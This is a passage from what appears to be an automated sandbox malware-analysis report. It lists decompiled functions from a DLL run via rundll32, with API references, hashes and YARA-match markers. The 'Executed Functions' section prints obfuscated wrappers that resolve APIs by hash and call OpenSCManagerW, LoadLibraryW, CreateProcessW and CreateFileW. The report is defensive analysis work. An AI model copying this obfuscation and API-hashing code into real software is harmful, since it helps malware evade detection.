Associated: 00000007.00000002.2104690779.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104697302.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2104705101.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$Read$QueryVirtual
String ID:
API String ID: 4108280708-0
Opcode ID: bf404f711d3082d50f5bbd0f7f711224f62efa474e87bb40448eead53f7fc99f
Instruction ID: a489c81f2b48b45f7abe8d82c2fa530717afe034d23ef7191f16fae001b152d3
Opcode Fuzzy Hash: bf404f711d3082d50f5bbd0f7f711224f62efa474e87bb40448eead53f7fc99f
Instruction Fuzzy Hash: 02415E71600619EBEB10CF59DC80B99B7A8FF483A5F04416AED0ADB705D731E961CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 1000A35A, Relevance: 6.1, APIs: 4, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000A35A(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				int _v20;
				int _t35;
				int _t38;
				int _t42;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E1000476A( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E1000A179( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t59 = 1;
							_t42 = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t42;
							if(_t42 != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E10005EC6();
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							__eflags = _t50 -  *(_t59 + 0x74);
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(_t62[1] == 0) {
								goto L20;
							}
							L18:
							_t59 =  *(_t59 + 0x74);
							goto L21;
						}
						__eflags = _t50 -  *(_t59 + 0x74);
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}

0x1000a362
0x1000a367
0x1000a381
0x00000000
0x1000a381
0x1000a369
0x1000a36e
0x00000000
0x00000000
0x1000a373
0x1000a38e
0x1000a393
0x1000a396
0x1000a39d
0x1000a3bc
0x1000a3c3
0x1000a3c5
0x1000a409
0x1000a411
0x1000a420
0x1000a426
0x1000a428
0x1000a438
0x1000a438
0x1000a43c
0x1000a43e
0x1000a441
0x1000a441
0x1000a441
0x1000a441
0x00000000
0x1000a447
0x1000a42a
0x1000a42a
0x1000a42f
0x1000a42f
0x1000a432
0x00000000
0x1000a432
0x1000a3c7
0x1000a3ca
0x1000a3ce
0x1000a3f7
0x1000a3f7
0x1000a3fa
0x1000a3fa
0x00000000
0x00000000
0x1000a3fc
0x1000a400
0x00000000
0x00000000
0x1000a402
0x1000a402
0x00000000
0x1000a402
0x1000a3d0
0x1000a3d3
0x00000000
0x00000000
0x1000a3d7
0x1000a3ea
0x1000a3f0
0x1000a3f3
0x1000a3f5
0x00000000
0x00000000
0x00000000
0x1000a3f5
0x1000a39f
0x1000a3a2
0x1000a3a4
0x1000a3a9
0x1000a3a9
0x1000a3ae
0x00000000
0x1000a3ae
0x1000a375
0x1000a37a
0x1000a37e
0x1000a37e
0x00000000

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1000A38E
__isleadbyte_l.LIBCMT ref: 1000A3BC
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,100020F6,00000000,?,100020F6,?,?,?), ref: 1000A3EA
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,100020F6,00000000,?,100020F6,?,?,?), ref: 1000A420

Memory Dump Source

Source File: 00000007.00000002.2104680922.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2104676360.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104690779.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104697302.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2104705101.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: d9634a8e026aa07a820c9bcf7b7f3b6f286b4ef525d2eb9816761caa15114c1e
Instruction ID: 9d1cf0849eee1a075b18554553a91368e22c05569ceb8c6a927f46b954fbfb1a
Opcode Fuzzy Hash: d9634a8e026aa07a820c9bcf7b7f3b6f286b4ef525d2eb9816761caa15114c1e
Instruction Fuzzy Hash: 6231B035A00256AFEB11CF65C848BAE7BE5FF822D0F124628F850871A4E770E9D1DB90

Uniqueness

Uniqueness Score: -1.00%

Function 10006610, Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 20%

			E10006610(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
				void* __edi;
				void* __ebp;
				void* _t25;
				void* _t28;
				intOrPtr _t29;
				void* _t30;
				intOrPtr* _t31;
				void* _t33;

				_t30 = __esi;
				_t27 = __ebx;
				_t35 = _a28;
				_t29 = _a8;
				if(_a28 != 0) {
					_push(_a28);
					_push(_a24);
					_push(_t29);
					_push(_a4);
					E10006C38(__ebx, _t29, __esi, _t35);
					_t33 = _t33 + 0x10;
				}
				_t36 = _a40;
				_push(_a4);
				if(_a40 != 0) {
					_push(_a40);
				} else {
					_push(_t29);
				}
				E100042B0(_t28);
				_push(_t30);
				_t31 = _a32;
				_push( *_t31);
				_push(_a20);
				_push(_a16);
				_push(_t29);
				E10006E99(_t27, _t31, _t36);
				_push(0x100);
				_push(_a36);
				 *((intOrPtr*)(_t29 + 8)) =  *((intOrPtr*)(_t31 + 4)) + 1;
				_push( *((intOrPtr*)(_a24 + 0xc)));
				_push(_a20);
				_push(_a12);
				_push(_t29);
				_push(_a4);
				_t25 = E10006402(_t27, _t29, _t31, _t36);
				if(_t25 != 0) {
					E10004280(_t25, _t29);
					return _t25;
				}
				return _t25;
			}

0x10006610
0x10006610
0x10006613
0x10006618
0x1000661b
0x1000661d
0x10006620
0x10006623
0x10006624
0x10006627
0x1000662c
0x1000662c
0x1000662f
0x10006633
0x10006636
0x1000663b
0x10006638
0x10006638
0x10006638
0x1000663e
0x10006643
0x10006644
0x10006647
0x10006649
0x1000664c
0x1000664f
0x10006650
0x10006658
0x1000665d
0x10006661
0x10006667
0x1000666a
0x1000666d
0x10006670
0x10006671
0x10006674
0x1000667f
0x10006683
0x00000000
0x10006683
0x1000668a

APIs

___BuildCatchObject.LIBCMT ref: 10006627

Part of subcall function 10006C38: ___AdjustPointer.LIBCMT ref: 10006C81

_UnwindNestedFrames.LIBCMT ref: 1000663E
___FrameUnwindToState.LIBCMT ref: 10006650
CallCatchBlock.LIBCMT ref: 10006674

Memory Dump Source

Source File: 00000007.00000002.2104680922.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2104676360.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104690779.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104697302.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2104705101.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID:
API String ID: 2633735394-0
Opcode ID: 38cfbb4d2267087fb04e53c3657a99f3c08a1c5c1ee859ea4b28d79f0814a6ce
Instruction ID: 929118807ddd2d015550d77d84a67e82c7ccc00f3a1cd5c495e14181e13c7b39
Opcode Fuzzy Hash: 38cfbb4d2267087fb04e53c3657a99f3c08a1c5c1ee859ea4b28d79f0814a6ce
Instruction Fuzzy Hash: D6014C72000109BBEF02CF55DC01EDA3BBAFF5C790F228119F91862124C732E961DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 100032A0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

StringFromGUID2.OLE32(?,?,00000027), ref: 100032CF
GetModuleFileNameW.KERNEL32(10000000,?,00000104,?,10002572,1000D260,80000002,4693EE51), ref: 100032E3

Strings

Recipe (.recipe) Property Handler, xrefs: 100032A6

Memory Dump Source

Source File: 00000007.00000002.2104680922.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2104676360.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104690779.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104697302.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2104705101.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFromModuleNameString
String ID: Recipe (.recipe) Property Handler
API String ID: 1402647516-129706424
Opcode ID: 7ed536aff0d5137a22396f0237d134f3e1b2848668901a19bc3cda47405f2b17
Instruction ID: 6f8015bcf9db97dc62130dd9dbc2d8b03967e6a2f427fd85d2ca8f80d55362ab
Opcode Fuzzy Hash: 7ed536aff0d5137a22396f0237d134f3e1b2848668901a19bc3cda47405f2b17
Instruction Fuzzy Hash: 7AF01231510718AFD310DFA8C844E96B7E8EF09754F00851BF689D7610E7B0A544CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10001980, Relevance: 5.1, APIs: 4, Instructions: 57
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10001980(void* _a4) {
				void* _t15;
				void* _t16;
				void* _t20;
				intOrPtr _t23;
				void* _t30;
				signed int _t32;
				void* _t34;
				void* _t35;

				_t34 = _a4;
				if(_t34 == 0) {
					return _t15;
				}
				if( *((intOrPtr*)(_t34 + 0x10)) != 0) {
					_t30 =  *(_t34 + 4);
					 *((intOrPtr*)( *((intOrPtr*)( *_t34 + 0x28)) + _t30))(_t30, 0, 0);
				}
				if( *(_t34 + 8) == 0) {
					L10:
					_t16 =  *(_t34 + 4);
					if(_t16 != 0) {
						VirtualFree(_t16, 0, 0x8000);
					}
					return HeapFree(GetProcessHeap(), 0, _t34);
				} else {
					_t32 = 0;
					if( *((intOrPtr*)(_t34 + 0xc)) <= 0) {
						L8:
						_t20 =  *(_t34 + 8);
						if(_t20 != 0) {
							VirtualFree(_t20, 0, 0x8000);
						}
						goto L10;
					} else {
						goto L5;
					}
					do {
						L5:
						_t23 =  *((intOrPtr*)( *(_t34 + 8) + _t32 * 4));
						if(_t23 != 0) {
							 *((intOrPtr*)( *((intOrPtr*)(_t34 + 0x24))))(_t23,  *((intOrPtr*)(_t34 + 0x28)));
							_t35 = _t35 + 8;
						}
						_t32 = _t32 + 1;
					} while (_t32 <  *((intOrPtr*)(_t34 + 0xc)));
					goto L8;
				}
			}

0x10001984
0x10001989
0x10001a09
0x10001a09
0x1000198f
0x10001993
0x100019a0
0x100019a0
0x100019a6
0x100019e2
0x100019e2
0x100019e7
0x100019f1
0x100019f1
0x00000000
0x100019a8
0x100019a9
0x100019ae
0x100019cc
0x100019cc
0x100019d2
0x100019dc
0x100019dc
0x00000000
0x00000000
0x00000000
0x00000000
0x100019b0
0x100019b0
0x100019b3
0x100019b8
0x100019c1
0x100019c3
0x100019c3
0x100019c6
0x100019c7
0x00000000
0x100019b0

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00000000,?,10001DC4,00000000,100013CB,EC8B55CC,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50), ref: 100019DC
VirtualFree.KERNEL32(?,00000000,00008000,00000000,?,10001DC4,00000000,100013CB,EC8B55CC,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50), ref: 100019F1
GetProcessHeap.KERNEL32(00000000,EC8B55CC,00000000,?,10001DC4,00000000,100013CB,EC8B55CC,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50,00000000), ref: 100019FA
HeapFree.KERNEL32(00000000,?,10001DC4), ref: 10001A01

Memory Dump Source

Source File: 00000007.00000002.2104680922.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2104676360.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104690779.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104697302.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2104705101.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: Free$HeapVirtual$Process
String ID:
API String ID: 3505259878-0
Opcode ID: f0dbf08bf0ac1d416156738cb98c565ad35b7fd76a7272c1614ca254b19f3500
Instruction ID: 46a294df184e67868fe018602a73977999fd3160e39f49d8b46b80fbf7fdd7f8
Opcode Fuzzy Hash: f0dbf08bf0ac1d416156738cb98c565ad35b7fd76a7272c1614ca254b19f3500
Instruction Fuzzy Hash: 1E115A31600711ABE620DBA5CC89F9673E8EB48BD1F108818F59AD7294CB70F841CBA0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 2812 Parent PID: 2764 rundll32.exeCOMMON

Executed Functions

Function 00322959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00322959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E0032602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E003307A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}

0x0032295f
0x00322964
0x00322967
0x0032296a
0x0032296d
0x0032296e
0x0032296f
0x00322977
0x00322985
0x0032298a
0x00322992
0x0032299a
0x003229a2
0x003229a9
0x003229b0
0x003229b7
0x003229bb
0x003229cf
0x003229dc
0x003229e2

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 003229DC

Strings

<^, xrefs: 00322977

Memory Dump Source

Source File: 00000008.00000002.2102904975.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true

Associated: 00000008.00000002.2102890561.0000000000320000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2102933368.000000000033C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: ManagerOpen
String ID: <^
API String ID: 1889721586-3203995635
Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction ID: 19e97f6840cba346f27175bbd0f6707e73230624cb8d0afad74871b51518aa88
Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction Fuzzy Hash: 4A018072A00108BFEB18DF95DC4A8DFBFB6EF44310F108088F508A6250D7B69F619B91

Uniqueness

Uniqueness Score: -1.00%

Function 0032C6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0032C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E0032602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E003307A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}

0x0032c6e1
0x0032c6e6
0x0032c6f0
0x0032c6fc
0x0032c703
0x0032c706
0x0032c70d
0x0032c711
0x0032c715
0x0032c71c
0x0032c723
0x0032c72a
0x0032c731
0x0032c738
0x0032c751
0x0032c762
0x0032c768

APIs

SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0032C762

Strings

/O, xrefs: 0032C6E6

Memory Dump Source

Source File: 00000008.00000002.2102904975.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true

Associated: 00000008.00000002.2102890561.0000000000320000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2102933368.000000000033C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FolderPath
String ID: /O
API String ID: 1514166925-1923427199
Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction ID: c440427603abae4b40e5aa15c3b7e6cc0b4f57c7c545ff541deaa90d690fa6e6
Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction Fuzzy Hash: 7B1133B290122DBBCB25DF94DC4A8DFBFB8EF04714F108188F90966210D3714B659BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00321000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
libraryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00321000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0032602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E003307A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}

0x00321006
0x00321009
0x0032100c
0x00321011
0x00321016
0x0032101d
0x00321026
0x0032102d
0x00321034
0x0032103b
0x00321047
0x0032104f
0x00321057
0x0032105e
0x00321065
0x0032106c
0x00321073
0x00321077
0x0032108b
0x00321096
0x0032109b

APIs

LoadLibraryW.KERNEL32(0033A3B7), ref: 00321096

Strings

[, xrefs: 0032103B

Memory Dump Source

Source File: 00000008.00000002.2102904975.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true

Associated: 00000008.00000002.2102890561.0000000000320000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2102933368.000000000033C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: LibraryLoad
String ID: [
API String ID: 1029625771-3431493590
Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction ID: b31de7921f170618207fbfc8623610397a7294220898ff5d299751b84dde1968
Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction Fuzzy Hash: BC016DB6D0130CFBDF04DFA4C94A5DEBBB1EF54318F108188E41466291D3B19B649B91

Uniqueness

Uniqueness Score: -1.00%

Function 00324859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00324859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E003307A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}

0x0032485e
0x0032487a
0x0032487d
0x00324884
0x0032488b
0x00324892
0x0032489d
0x003248a0
0x003248ad
0x003248b7

APIs

ExitProcess.KERNELBASE(00000000), ref: 003248B7

Strings

[, xrefs: 0032488B

Memory Dump Source

Source File: 00000008.00000002.2102904975.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true

Associated: 00000008.00000002.2102890561.0000000000320000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2102933368.000000000033C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: ExitProcess
String ID: [
API String ID: 621844428-1822564810
Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction ID: ece2571b35b6db8ed5a81b511bcffbede777eaf0b86dffbdfcb25762da1102d0
Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction Fuzzy Hash: 3FF01D70905209FBDB04CFE8C95699EBFB5EB40301F20818CE444B7290E3715F509B50

Uniqueness

Uniqueness Score: -1.00%

Function 00334F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00334F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0032602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E003307A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}

0x00334f80
0x00334f81
0x00334f82
0x00334f86
0x00334f87
0x00334f8c
0x00334fa5
0x00334fa8
0x00334faf
0x00334fb6
0x00334fc7
0x00334fca
0x00334fd7
0x00334fe2
0x00334fe7

APIs

CloseHandle.KERNELBASE(003E66D8), ref: 00334FE2

Strings

{#lm, xrefs: 00334FC2

Memory Dump Source

Source File: 00000008.00000002.2102904975.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true

Associated: 00000008.00000002.2102890561.0000000000320000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2102933368.000000000033C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle
String ID: {#lm
API String ID: 2962429428-1564096886
Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction ID: 00638327ed37fc23e984292654fae3d78636a32fd06e166a9b5081f87cfe901e
Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction Fuzzy Hash: E3F037B081120CFFDB09DFA4D98289EBFBAEF40300F208199E805BB250D3715B50AB50

Uniqueness

Uniqueness Score: -1.00%

Function 0033976F, Relevance: 1.6, APIs: 1, Instructions: 63
processCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E0033976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0032602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E003307A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}

0x00339772
0x00339773
0x00339778
0x0033977a
0x0033977b
0x0033977e
0x0033977f
0x00339782
0x00339785
0x00339788
0x00339789
0x0033978c
0x0033978f
0x00339790
0x00339791
0x00339794
0x00339797
0x0033979a
0x0033979d
0x003397a0
0x003397a3
0x003397a6
0x003397a7
0x003397a8
0x003397ad
0x003397b7
0x003397c3
0x003397ca
0x003397d1
0x003397d8
0x003397df
0x003397e3
0x003397fc
0x00339816
0x0033981d

APIs

CreateProcessW.KERNEL32(0032591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,0032591A), ref: 00339816

Memory Dump Source

Source File: 00000008.00000002.2102904975.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true

Associated: 00000008.00000002.2102890561.0000000000320000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2102933368.000000000033C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction ID: dbcc302de3bebab8907db47c7b5197216a766566c5772b33908ae9f1b79e2d07
Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction Fuzzy Hash: CD11B072901188BBDF1A9F96DC0ACDF7F7AEF89750F108148FA1556120D2728A60EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0032B566, Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E0032B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E0032602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E003307A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}

0x0032b569
0x0032b56a
0x0032b56d
0x0032b572
0x0032b574
0x0032b577
0x0032b57a
0x0032b57d
0x0032b580
0x0032b583
0x0032b586
0x0032b587
0x0032b58a
0x0032b58d
0x0032b590
0x0032b593
0x0032b594
0x0032b595
0x0032b59a
0x0032b5a4
0x0032b5b8
0x0032b5c0
0x0032b5c4
0x0032b5cb
0x0032b5d2
0x0032b5d9
0x0032b5e6
0x0032b5fd
0x0032b604

APIs

